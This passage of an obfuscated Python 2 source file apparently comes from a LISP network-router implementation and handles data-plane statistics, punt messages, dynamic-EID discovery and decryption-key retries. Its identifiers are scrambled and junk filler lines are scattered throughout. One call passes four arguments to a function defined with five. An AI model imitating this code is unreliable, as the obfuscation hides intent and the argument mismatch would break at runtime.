if 79 - 79: OoOoOO00 . IiII * iII111i % OoooooooOO % i1IIi % iIii1I11I1II1
if ( do_clear == False ) :
oOooiIIIii1Ii1Ii1 = iiIOooo0000O0O00 [ "entries" ]
lisp_map_cache . walk_cache ( lisp_ipc_walk_map_cache , oOooiIIIii1Ii1Ii1 )
if 20 - 20: I1Ii111 % oO0o * iIii1I11I1II1 % oO0o . IiII % OoooooooOO
if 11 - 11: Oo0Ooo / Oo0Ooo / OoO0O00 / oO0o . iIii1I11I1II1 + I1Ii111
lisp_write_to_dp_socket ( iiIOooo0000O0O00 )
return
if 23 - 23: Oo0Ooo * IiII - I1Ii111 . OoooooooOO
if 78 - 78: OoOoOO00 - iIii1I11I1II1
if 20 - 20: i1IIi
if 72 - 72: ooOoO0o . II111iiii
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
if 100 - 100: O0
if 19 - 19: Ii1I * iIii1I11I1II1 * Oo0Ooo - i11iIiiIii * i11iIiiIii - OOooOOo
if 88 - 88: O0 . iIii1I11I1II1 . I1ii11iIi11i
if 80 - 80: oO0o / i1IIi * iIii1I11I1II1
if 38 - 38: Ii1I
def lisp_process_data_plane_stats ( msg , lisp_sockets , lisp_port ) :
if ( msg . has_key ( "entries" ) == False ) :
lprint ( "No 'entries' in stats IPC message" )
return
if 20 - 20: iIii1I11I1II1 + Oo0Ooo - Ii1I / i11iIiiIii . OoO0O00
if ( type ( msg [ "entries" ] ) != list ) :
lprint ( "'entries' in stats IPC message must be an array" )
return
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
for msg in msg [ "entries" ] :
if ( msg . has_key ( "eid-prefix" ) == False ) :
lprint ( "No 'eid-prefix' in stats IPC message" )
continue
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
I11i11i1 = msg [ "eid-prefix" ]
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if ( msg . has_key ( "instance-id" ) == False ) :
lprint ( "No 'instance-id' in stats IPC message" )
continue
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
o0OoO0000o = int ( msg [ "instance-id" ] )
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
OOo0O0O0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
OOo0O0O0o0 . store_prefix ( I11i11i1 )
IiiiiII1i = lisp_map_cache_lookup ( None , OOo0O0O0o0 )
if ( IiiiiII1i == None ) :
lprint ( "Map-cache entry for {} not found for stats update" . format ( I11i11i1 ) )
if 28 - 28: Ii1I - i11iIiiIii . oO0o / II111iiii
continue
if 82 - 82: iII111i * iII111i . IiII * II111iiii
if 17 - 17: OoooooooOO % I1Ii111 * I1Ii111 / II111iiii . OoOoOO00 * iII111i
if ( msg . has_key ( "rlocs" ) == False ) :
lprint ( "No 'rlocs' in stats IPC message for {}" . format ( I11i11i1 ) )
if 80 - 80: IiII % i11iIiiIii
continue
if 6 - 6: II111iiii + i11iIiiIii - Oo0Ooo % OOooOOo + Oo0Ooo
if ( type ( msg [ "rlocs" ] ) != list ) :
lprint ( "'rlocs' in stats IPC message must be an array" )
continue
if 46 - 46: iII111i
iIi1iii = msg [ "rlocs" ]
if 60 - 60: OoooooooOO + i11iIiiIii - o0oOOo0O0Ooo . OoooooooOO + oO0o / ooOoO0o
if 93 - 93: I1ii11iIi11i - ooOoO0o - Oo0Ooo + o0oOOo0O0Ooo . ooOoO0o
if 98 - 98: II111iiii
if 56 - 56: i1IIi % IiII / I1Ii111
for IIIIII1I in iIi1iii :
if ( IIIIII1I . has_key ( "rloc" ) == False ) : continue
if 100 - 100: ooOoO0o % II111iiii - Oo0Ooo / OoO0O00 - I1Ii111 * IiII
o0O00oo0O = IIIIII1I [ "rloc" ]
if ( o0O00oo0O == "no-address" ) : continue
if 61 - 61: OoOoOO00 - I1Ii111 * ooOoO0o + Oo0Ooo / IiII
oOo00O = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
oOo00O . store_address ( o0O00oo0O )
if 79 - 79: ooOoO0o % OoooooooOO
iIII = IiiiiII1i . get_rloc ( oOo00O )
if ( iIII == None ) : continue
if 67 - 67: I1IiiI + OoooooooOO % OoO0O00 . OoooooooOO + I11i / oO0o
if 33 - 33: I1ii11iIi11i
if 5 - 5: O0
if 50 - 50: Oo0Ooo % IiII * oO0o
oO0OO0 = 0 if IIIIII1I . has_key ( "packet-count" ) == False else IIIIII1I [ "packet-count" ]
if 58 - 58: oO0o + I1Ii111 + Oo0Ooo
oOooO0O0 = 0 if IIIIII1I . has_key ( "byte-count" ) == False else IIIIII1I [ "byte-count" ]
if 57 - 57: Ii1I % i11iIiiIii * Ii1I + i1IIi * iIii1I11I1II1
Oo0OO0000oooo = 0 if IIIIII1I . has_key ( "seconds-last-packet" ) == False else IIIIII1I [ "seconds-last-packet" ]
if 42 - 42: iIii1I11I1II1 . I1IiiI
if 57 - 57: IiII - i1IIi * ooOoO0o
iIII . stats . packet_count += oO0OO0
iIII . stats . byte_count += oOooO0O0
iIII . stats . last_increment = lisp_get_timestamp ( ) - Oo0OO0000oooo
if 5 - 5: oO0o . O0 * IiII / Ii1I + OoO0O00
lprint ( "Update stats {}/{}/{}s for {} RLOC {}" . format ( oO0OO0 , oOooO0O0 ,
Oo0OO0000oooo , I11i11i1 , o0O00oo0O ) )
if 75 - 75: OOooOOo * OoOoOO00
if 82 - 82: Ii1I
if 83 - 83: I1IiiI
if 22 - 22: IiII / Ii1I + I1Ii111 % iIii1I11I1II1
if 75 - 75: OoOoOO00 % OoOoOO00 % o0oOOo0O0Ooo % I1ii11iIi11i + IiII
if ( IiiiiII1i . group . is_null ( ) and IiiiiII1i . has_ttl_elapsed ( ) ) :
I11i11i1 = green ( IiiiiII1i . print_eid_tuple ( ) , False )
lprint ( "Refresh map-cache entry {}" . format ( I11i11i1 ) )
lisp_send_map_request ( lisp_sockets , lisp_port , None , IiiiiII1i . eid , None )
if 45 - 45: I11i - iIii1I11I1II1
if 20 - 20: OoOoOO00
return
if 84 - 84: OoOoOO00
if 59 - 59: Ii1I / I1Ii111 + i11iIiiIii
if 20 - 20: O0 / I1Ii111 - OOooOOo % iIii1I11I1II1
if 89 - 89: O0 * OoOoOO00 . ooOoO0o
if 11 - 11: iIii1I11I1II1 * OoO0O00 . I1IiiI * OoOoOO00 / II111iiii
if 72 - 72: I11i
if 7 - 7: i1IIi - o0oOOo0O0Ooo - I1IiiI
if 62 - 62: OoOoOO00 * oO0o - I1IiiI / Ii1I
if 48 - 48: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoOoOO00
if 13 - 13: OoO0O00 - Ii1I . ooOoO0o / O0 * OoOoOO00
if 57 - 57: O0 + OoooooooOO % o0oOOo0O0Ooo / I1Ii111 / OOooOOo - OoOoOO00
if 48 - 48: o0oOOo0O0Ooo - II111iiii + OoOoOO00
if 54 - 54: II111iiii - OoO0O00 - o0oOOo0O0Ooo - O0 % I1Ii111
if 9 - 9: i1IIi % iII111i / Ii1I
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
if 92 - 92: OoO0O00 - iII111i
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
def lisp_process_data_plane_decap_stats ( msg , lisp_ipc_socket ) :
if 70 - 70: I1Ii111 % iIii1I11I1II1
if 74 - 74: i1IIi % i11iIiiIii + oO0o
if 94 - 94: OoO0O00 * I1IiiI / O0 + I1Ii111 / i11iIiiIii
if 34 - 34: Oo0Ooo . i1IIi
if 97 - 97: I11i
if ( lisp_i_am_itr ) :
lprint ( "Send decap-stats IPC message to lisp-etr process" )
OoOO0o00OOO0o = "stats%{}" . format ( json . dumps ( msg ) )
OoOO0o00OOO0o = lisp_command_ipc ( OoOO0o00OOO0o , "lisp-itr" )
lisp_ipc ( OoOO0o00OOO0o , lisp_ipc_socket , "lisp-etr" )
return
if 89 - 89: iII111i % OoOoOO00 . Oo0Ooo
if 20 - 20: oO0o % OoOoOO00
if 93 - 93: I1ii11iIi11i - Ii1I % i1IIi / i1IIi
if 82 - 82: OOooOOo
if 27 - 27: I1Ii111 / IiII - i1IIi * Ii1I
if 90 - 90: ooOoO0o
if 100 - 100: iII111i * i1IIi . iII111i / O0 / OoO0O00 - oO0o
if 65 - 65: OoOoOO00 + ooOoO0o * OoO0O00 % OoooooooOO + OoooooooOO * OoooooooOO
OoOO0o00OOO0o = bold ( "IPC" , False )
lprint ( "Process decap-stats {} message: '{}'" . format ( OoOO0o00OOO0o , msg ) )
if 49 - 49: o0oOOo0O0Ooo + i1IIi / iII111i
if ( lisp_i_am_etr ) : msg = json . loads ( msg )
if 43 - 43: i1IIi . OoO0O00 + I1ii11iIi11i
Oo00oO0OOOOO0 = [ "good-packets" , "ICV-error" , "checksum-error" ,
"lisp-header-error" , "no-decrypt-key" , "bad-inner-version" ,
"outer-header-error" ]
if 10 - 10: o0oOOo0O0Ooo / OOooOOo + i11iIiiIii
for O00O0ooOOooo in Oo00oO0OOOOO0 :
oO0OO0 = 0 if msg . has_key ( O00O0ooOOooo ) == False else msg [ O00O0ooOOooo ] [ "packet-count" ]
if 89 - 89: Oo0Ooo % iII111i . iIii1I11I1II1 % I11i * Oo0Ooo - ooOoO0o
lisp_decap_stats [ O00O0ooOOooo ] . packet_count += oO0OO0
if 14 - 14: iIii1I11I1II1
oOooO0O0 = 0 if msg . has_key ( O00O0ooOOooo ) == False else msg [ O00O0ooOOooo ] [ "byte-count" ]
if 29 - 29: i1IIi
lisp_decap_stats [ O00O0ooOOooo ] . byte_count += oOooO0O0
if 12 - 12: OOooOOo
Oo0OO0000oooo = 0 if msg . has_key ( O00O0ooOOooo ) == False else msg [ O00O0ooOOooo ] [ "seconds-last-packet" ]
if 84 - 84: i11iIiiIii * o0oOOo0O0Ooo
lisp_decap_stats [ O00O0ooOOooo ] . last_increment = lisp_get_timestamp ( ) - Oo0OO0000oooo
if 24 - 24: Ii1I . OOooOOo
return
if 34 - 34: I11i % Oo0Ooo . II111iiii - OoO0O00 - I1Ii111 + Oo0Ooo
if 71 - 71: O0 + OOooOOo % OoooooooOO
if 51 - 51: I1ii11iIi11i * o0oOOo0O0Ooo * I11i
if 27 - 27: OoOoOO00 % OoO0O00 * oO0o . II111iiii - i11iIiiIii
if 56 - 56: OOooOOo . IiII - OOooOOo / i11iIiiIii * I1ii11iIi11i
if 66 - 66: oO0o + ooOoO0o
if 1 - 1: ooOoO0o
if 61 - 61: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i + Oo0Ooo
if 75 - 75: Ii1I
if 79 - 79: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo / I11i . I11i / ooOoO0o
if 99 - 99: oO0o + I11i % i1IIi . iII111i
if 58 - 58: Oo0Ooo % i11iIiiIii . Oo0Ooo / Oo0Ooo - I1IiiI . Ii1I
if 65 - 65: OoO0O00
if 16 - 16: IiII % I1IiiI % iIii1I11I1II1 . I1IiiI . I1ii11iIi11i - IiII
if 6 - 6: I1Ii111 + OoO0O00 + O0 * OoOoOO00 . iIii1I11I1II1 . I1Ii111
if 93 - 93: ooOoO0o % iIii1I11I1II1 + I1ii11iIi11i
if 74 - 74: OoOoOO00 + I1ii11iIi11i
def lisp_process_punt ( punt_socket , lisp_send_sockets , lisp_ephem_port ) :
oO0o0i11I1IiI , oo00Oo0 = punt_socket . recvfrom ( 4000 )
if 43 - 43: i1IIi * Oo0Ooo + iIii1I11I1II1
oooooO0O0O = json . loads ( oO0o0i11I1IiI )
if ( type ( oooooO0O0O ) != dict ) :
lprint ( "Invalid punt message from {}, not in JSON format" . format ( oo00Oo0 ) )
if 70 - 70: iIii1I11I1II1
return
if 85 - 85: OoooooooOO * O0 % o0oOOo0O0Ooo % Ii1I . OoooooooOO - I11i
o0ooooO = bold ( "Punt" , False )
lprint ( "{} message from '{}': '{}'" . format ( o0ooooO , oo00Oo0 , oooooO0O0O ) )
if 19 - 19: iII111i * i1IIi - I11i + O0 % Ii1I - OoOoOO00
if ( oooooO0O0O . has_key ( "type" ) == False ) :
lprint ( "Punt IPC message has no 'type' key" )
return
if 1 - 1: I11i * Oo0Ooo
if 53 - 53: II111iiii / i1IIi + OoooooooOO * O0
if 62 - 62: IiII . O0
if 87 - 87: I1ii11iIi11i / oO0o / IiII . OOooOOo
if 91 - 91: OOooOOo % oO0o . OoOoOO00 . I1IiiI - OoOoOO00
if ( oooooO0O0O [ "type" ] == "statistics" ) :
lisp_process_data_plane_stats ( oooooO0O0O , lisp_send_sockets , lisp_ephem_port )
return
if 18 - 18: O0 - I1IiiI + i1IIi % i11iIiiIii
if ( oooooO0O0O [ "type" ] == "decap-statistics" ) :
lisp_process_data_plane_decap_stats ( oooooO0O0O , punt_socket )
return
if 97 - 97: iII111i * OoooooooOO + I1Ii111 + ooOoO0o - ooOoO0o
if 63 - 63: o0oOOo0O0Ooo * OOooOOo + iIii1I11I1II1 + Oo0Ooo
if 25 - 25: oO0o + IiII % o0oOOo0O0Ooo
if 24 - 24: OoOoOO00
if 87 - 87: I1ii11iIi11i / ooOoO0o * i1IIi
if ( oooooO0O0O [ "type" ] == "restart" ) :
lisp_process_data_plane_restart ( )
return
if 71 - 71: OoOoOO00 - I11i
if 83 - 83: oO0o + oO0o - Oo0Ooo . Oo0Ooo - iII111i . OOooOOo
if 56 - 56: OoOoOO00 * IiII + i1IIi
if 40 - 40: I1ii11iIi11i / O0
if 87 - 87: ooOoO0o
if ( oooooO0O0O [ "type" ] != "discovery" ) :
lprint ( "Punt IPC message has wrong format" )
return
if 100 - 100: iII111i + II111iiii * Oo0Ooo * OOooOOo
if ( oooooO0O0O . has_key ( "interface" ) == False ) :
lprint ( "Invalid punt message from {}, required keys missing" . format ( oo00Oo0 ) )
if 6 - 6: IiII % OOooOOo
return
if 3 - 3: OoOoOO00 / OoOoOO00 - II111iiii
if 41 - 41: oO0o
if 12 - 12: I1IiiI + I1Ii111
if 66 - 66: I1Ii111 + OOooOOo + I1Ii111 . OoooooooOO * oO0o / OoO0O00
if 74 - 74: O0 % OOooOOo * OoOoOO00 / oO0o - Oo0Ooo
OoO0o0OOOO = oooooO0O0O [ "interface" ]
if ( OoO0o0OOOO == "" ) :
o0OoO0000o = int ( oooooO0O0O [ "instance-id" ] )
if ( o0OoO0000o == - 1 ) : return
else :
o0OoO0000o = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 79 - 79: Ii1I + IiII
if 21 - 21: o0oOOo0O0Ooo * iII111i * o0oOOo0O0Ooo * o0oOOo0O0Ooo . Oo0Ooo
if 98 - 98: I1ii11iIi11i
if 58 - 58: IiII / i11iIiiIii % I11i
if 74 - 74: OoooooooOO - I1ii11iIi11i + OOooOOo % IiII . o0oOOo0O0Ooo
O00oOOOOoOO = None
if ( oooooO0O0O . has_key ( "source-eid" ) ) :
o0000oO0OOOo0 = oooooO0O0O [ "source-eid" ]
O00oOOOOoOO = lisp_address ( LISP_AFI_NONE , o0000oO0OOOo0 , 0 , o0OoO0000o )
if ( O00oOOOOoOO . is_null ( ) ) :
lprint ( "Invalid source-EID format '{}'" . format ( o0000oO0OOOo0 ) )
return
if 21 - 21: Ii1I
if 72 - 72: I1Ii111 . OoooooooOO / I1Ii111 - Ii1I / I1ii11iIi11i * I1ii11iIi11i
I11iIii1i11 = None
if ( oooooO0O0O . has_key ( "dest-eid" ) ) :
O0IiIIiI1111iI = oooooO0O0O [ "dest-eid" ]
I11iIii1i11 = lisp_address ( LISP_AFI_NONE , O0IiIIiI1111iI , 0 , o0OoO0000o )
if ( I11iIii1i11 . is_null ( ) ) :
lprint ( "Invalid dest-EID format '{}'" . format ( O0IiIIiI1111iI ) )
return
if 78 - 78: iIii1I11I1II1 - OoOoOO00 * I1IiiI + I1ii11iIi11i
if 34 - 34: Ii1I / Oo0Ooo - II111iiii + iIii1I11I1II1 . I1ii11iIi11i % II111iiii
if 37 - 37: OoO0O00 * i1IIi
if 84 - 84: OOooOOo . ooOoO0o % iIii1I11I1II1
if 52 - 52: I1IiiI / OoO0O00 + OoOoOO00
if 94 - 94: OoooooooOO + O0 * iIii1I11I1II1 * II111iiii
if 90 - 90: I11i + O0 / I1IiiI . oO0o / O0
if 46 - 46: O0 . O0 - oO0o . II111iiii * I1IiiI * Ii1I
if ( O00oOOOOoOO ) :
oOo = green ( O00oOOOOoOO . print_address ( ) , False )
Ooooo00 = lisp_db_for_lookups . lookup_cache ( O00oOOOOoOO , False )
if ( Ooooo00 != None ) :
if 10 - 10: i1IIi + i1IIi . i1IIi - I1IiiI - I1IiiI
if 26 - 26: Ii1I * I11i / I11i
if 79 - 79: ooOoO0o / oO0o - oO0o / OoooooooOO
if 91 - 91: iIii1I11I1II1 - O0 * o0oOOo0O0Ooo * o0oOOo0O0Ooo . II111iiii
if 69 - 69: II111iiii - Oo0Ooo + i1IIi . II111iiii + o0oOOo0O0Ooo
if ( Ooooo00 . dynamic_eid_configured ( ) ) :
II1i = lisp_allow_dynamic_eid ( OoO0o0OOOO , O00oOOOOoOO )
if ( II1i != None and lisp_i_am_itr ) :
lisp_itr_discover_eid ( Ooooo00 , O00oOOOOoOO , OoO0o0OOOO , II1i )
else :
lprint ( ( "Disallow dynamic source-EID {} " + "on interface {}" ) . format ( oOo , OoO0o0OOOO ) )
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
if 16 - 16: I11i
else :
lprint ( "Punt from non-EID source {}" . format ( oOo ) )
if 9 - 9: Ii1I / IiII * I11i - i11iIiiIii * I1ii11iIi11i / iII111i
if 61 - 61: O0 % iII111i
if 41 - 41: I1Ii111 * OoooooooOO
if 76 - 76: OoooooooOO * II111iiii . II111iiii / o0oOOo0O0Ooo - iII111i
if 49 - 49: O0 . I1ii11iIi11i . OoOoOO00 . I1Ii111 % O0 . iIii1I11I1II1
if 19 - 19: iIii1I11I1II1
if ( I11iIii1i11 ) :
IiiiiII1i = lisp_map_cache_lookup ( O00oOOOOoOO , I11iIii1i11 )
if ( IiiiiII1i == None or IiiiiII1i . action == LISP_SEND_MAP_REQUEST_ACTION ) :
if 97 - 97: Ii1I . I11i / ooOoO0o + Oo0Ooo
if 100 - 100: iII111i / I1Ii111 % OoOoOO00 . O0 / OoOoOO00
if 81 - 81: OoO0O00 % i11iIiiIii / OoO0O00 + ooOoO0o
if 100 - 100: O0 . Oo0Ooo % Oo0Ooo % O0 / i11iIiiIii
if 56 - 56: IiII - OOooOOo - OoOoOO00 - I11i
if ( lisp_rate_limit_map_request ( O00oOOOOoOO , I11iIii1i11 ) ) : return
lisp_send_map_request ( lisp_send_sockets , lisp_ephem_port ,
O00oOOOOoOO , I11iIii1i11 , None )
else :
oOo = green ( I11iIii1i11 . print_address ( ) , False )
lprint ( "Map-cache entry for {} already exists" . format ( oOo ) )
if 57 - 57: i1IIi
if 41 - 41: I11i / Ii1I
return
if 1 - 1: II111iiii / iII111i
if 83 - 83: OoO0O00 / iII111i
if 59 - 59: I1Ii111 % OOooOOo . I1IiiI + I1ii11iIi11i % oO0o
if 96 - 96: OoO0O00
if 53 - 53: oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
def lisp_ipc_map_cache_entry ( mc , jdata ) :
I1iII11ii1 = lisp_write_ipc_map_cache ( True , mc , dont_send = True )
jdata . append ( I1iII11ii1 )
return ( [ True , jdata ] )
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
def lisp_ipc_walk_map_cache ( mc , jdata ) :
if 35 - 35: iII111i . OoOoOO00 + i1IIi . I1Ii111 - oO0o
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: i1IIi / IiII . O0
if 72 - 72: OOooOOo
if ( mc . group . is_null ( ) ) : return ( lisp_ipc_map_cache_entry ( mc , jdata ) )
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if ( mc . source_cache == None ) : return ( [ True , jdata ] )
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
if 59 - 59: O0 + II111iiii + IiII % Oo0Ooo
if 71 - 71: oO0o
if 75 - 75: Oo0Ooo * oO0o + iIii1I11I1II1 / Oo0Ooo
jdata = mc . source_cache . walk_cache ( lisp_ipc_map_cache_entry , jdata )
return ( [ True , jdata ] )
if 51 - 51: Ii1I * Ii1I + iII111i * oO0o / OOooOOo - ooOoO0o
if 16 - 16: I1Ii111 + O0 - O0 * iIii1I11I1II1 / iII111i
if 4 - 4: iII111i
if 75 - 75: I1IiiI * IiII % OoO0O00 - ooOoO0o * iII111i
if 32 - 32: iII111i
if 59 - 59: OoOoOO00 - I1Ii111
if 34 - 34: ooOoO0o . OoooooooOO / ooOoO0o + OoooooooOO
def lisp_itr_discover_eid ( db , eid , input_interface , routed_interface ,
lisp_ipc_listen_socket ) :
I11i11i1 = eid . print_address ( )
if ( db . dynamic_eids . has_key ( I11i11i1 ) ) :
db . dynamic_eids [ I11i11i1 ] . last_packet = lisp_get_timestamp ( )
return
if 24 - 24: OoooooooOO * I1ii11iIi11i / O0 / Oo0Ooo * I1IiiI / ooOoO0o
if 33 - 33: Ii1I
if 20 - 20: Ii1I + I11i
if 98 - 98: OOooOOo
if 58 - 58: i11iIiiIii / OoOoOO00
Oo0O0oOoO0o0 = lisp_dynamic_eid ( )
Oo0O0oOoO0o0 . dynamic_eid . copy_address ( eid )
Oo0O0oOoO0o0 . interface = routed_interface
Oo0O0oOoO0o0 . last_packet = lisp_get_timestamp ( )
Oo0O0oOoO0o0 . get_timeout ( routed_interface )
db . dynamic_eids [ I11i11i1 ] = Oo0O0oOoO0o0
if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
OO0O0O0OO = ""
if ( input_interface != routed_interface ) :
OO0O0O0OO = ", routed-interface " + routed_interface
if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
O0OO0 = green ( I11i11i1 , False ) + bold ( " discovered" , False )
lprint ( "Dynamic-EID {} on interface {}{}, timeout {}" . format ( O0OO0 , input_interface , OO0O0O0OO , Oo0O0oOoO0o0 . timeout ) )
if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
if 21 - 21: IiII
if 43 - 43: IiII
if 9 - 9: OOooOOo * ooOoO0o + ooOoO0o . I1Ii111
if 8 - 8: IiII * iIii1I11I1II1
OoOO0o00OOO0o = "learn%{}%{}" . format ( I11i11i1 , routed_interface )
OoOO0o00OOO0o = lisp_command_ipc ( OoOO0o00OOO0o , "lisp-itr" )
lisp_ipc ( OoOO0o00OOO0o , lisp_ipc_listen_socket , "lisp-etr" )
return
if 7 - 7: I1Ii111 / OoooooooOO % O0 - I1ii11iIi11i
if 49 - 49: OoooooooOO . I1ii11iIi11i / OoooooooOO * oO0o
if 81 - 81: I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 84 - 84: OoooooooOO
if 95 - 95: o0oOOo0O0Ooo
if 22 - 22: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
if 41 - 41: oO0o . II111iiii
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
def lisp_retry_decap_keys ( addr_str , packet , iv , packet_icv ) :
if ( lisp_search_decap_keys == False ) : return
if 28 - 28: IiII + I11i
if 1 - 1: OoooooooOO - i11iIiiIii . OoooooooOO - o0oOOo0O0Ooo - OOooOOo * I1Ii111
if 56 - 56: Ii1I . OoO0O00
if 43 - 43: iII111i * iII111i
if ( addr_str . find ( ":" ) != - 1 ) : return
if 31 - 31: O0 - iIii1I11I1II1 . I11i . oO0o
i1II1 = lisp_crypto_keys_by_rloc_decap [ addr_str ]
if 96 - 96: OoooooooOO * iIii1I11I1II1 * Oo0Ooo
for ii1i1I1111ii in lisp_crypto_keys_by_rloc_decap :
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
if 47 - 47: OOooOOo * oO0o
if ( ii1i1I1111ii . find ( addr_str ) == - 1 ) : continue
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
if 71 - 71: Oo0Ooo
if ( ii1i1I1111ii == addr_str ) : continue
if 48 - 48: o0oOOo0O0Ooo / II111iiii / OoOoOO00 * o0oOOo0O0Ooo + I1IiiI . OoOoOO00
if 52 - 52: Ii1I / OoOoOO00 . OOooOOo * IiII . OoooooooOO
if 6 - 6: i1IIi . oO0o % IiII . Oo0Ooo % I11i
if 86 - 86: OoooooooOO + IiII % o0oOOo0O0Ooo . i1IIi . iII111i
I1iII11ii1 = lisp_crypto_keys_by_rloc_decap [ ii1i1I1111ii ]
if ( I1iII11ii1 == i1II1 ) : continue
if 25 - 25: iII111i * I1ii11iIi11i + I11i - I1ii11iIi11i
if 75 - 75: IiII
if 74 - 74: o0oOOo0O0Ooo - iIii1I11I1II1
if 92 - 92: i11iIiiIii * iIii1I11I1II1 - I1Ii111 . i1IIi
Iiiii1II = I1iII11ii1 [ 1 ]
if ( packet_icv != Iiiii1II . do_icv ( packet , iv ) ) :
lprint ( "Test ICV with key {} failed" . format ( red ( ii1i1I1111ii , False ) ) )
continue
if 100 - 100: O0 / OOooOOo
if 1 - 1: I1ii11iIi11i + iII111i
lprint ( "Changing decap crypto key to {}" . format ( red ( ii1i1I1111ii , False ) ) )
lisp_crypto_keys_by_rloc_decap [ addr_str ] = I1iII11ii1
if 61 - 61: oO0o - OOooOOo % II111iiii + IiII + O0 / o0oOOo0O0Ooo
return
if 78 - 78: I11i
if 32 - 32: II111iiii / II111iiii + o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
if 87 - 87: OOooOOo * OoO0O00
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
if 86 - 86: II111iiii
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
if 40 - 40: Oo0Ooo . II111iiii / II111iiii - i1IIi
def lisp_decent_pull_xtr_configured ( ) :
return ( lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None )
if 91 - 91: Ii1I
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o
if 37 - 37: OoO0O00 * OoooooooOO / oO0o * I11i * I1ii11iIi11i
if 42 - 42: OoooooooOO - ooOoO0o . OOooOOo + OoOoOO00
def lisp_is_decent_dns_suffix ( dns_name ) :
if ( lisp_decent_dns_suffix == None ) : return ( False )
oO00 = dns_name . split ( "." )
oO00 = "." . join ( oO00 [ 1 : : ] )
return ( oO00 == lisp_decent_dns_suffix )
if 53 - 53: o0oOOo0O0Ooo
if 55 - 55: ooOoO0o . i1IIi - ooOoO0o + O0 + I1IiiI
if 31 - 31: OoO0O00 % I1Ii111
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
if 81 - 81: i11iIiiIii
if 57 - 57: O0
